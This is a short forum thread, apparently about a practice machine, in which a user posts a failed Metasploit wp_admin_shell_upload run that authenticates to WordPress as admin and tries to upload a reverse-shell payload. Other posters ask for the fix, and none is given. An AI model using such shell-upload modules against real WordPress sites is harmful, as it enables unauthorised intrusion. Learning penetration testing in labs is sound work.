Problem with wp_shell_upload from metasploit....

Hi guys! In the past few days, I’ve been doing a machine with wordpress installed on it and i’ve managed to get valid admin creds. I then tried to use the admin_shell_upload module from metasploit, to get a reverse shell but wasn’t able to, instead it always returns with the same error:

msf exploit(unix/webapp/wp_admin_shell_upload) > run                                                                                                       

[*] Started reverse TCP handler on x.x.x.x:4444                                                                                                        
[*] Authenticating with WordPress using admin:admin123$..                                                                                
[+] Authenticated with WordPress                                                                                                                           
[*] Preparing payload...                                                                                                                                   
[*] Uploading payload...                                                                                                                                   
[-] Exploit aborted due to failure: unexpected-reply: Failed to upload the payload                                                                         
[*] Exploit completed, but no session was created.                                                                                                         
msf exploit(unix/webapp/wp_admin_shell_upload) >

i’ve read a lot of articles about this issue , tried a lot of different solutions but none actually worked. Would be absolutely great if you someone knew how to fix this issue. Thanks a lot guys!

nevermind got it :smile:

I am stuck in same step. I have tried every solutions available. can you tell me how did you solve that problem? Thanks

I have the same problem. I’m new to pentest, appreciate that if you can give me some hints.

bro how did you get it?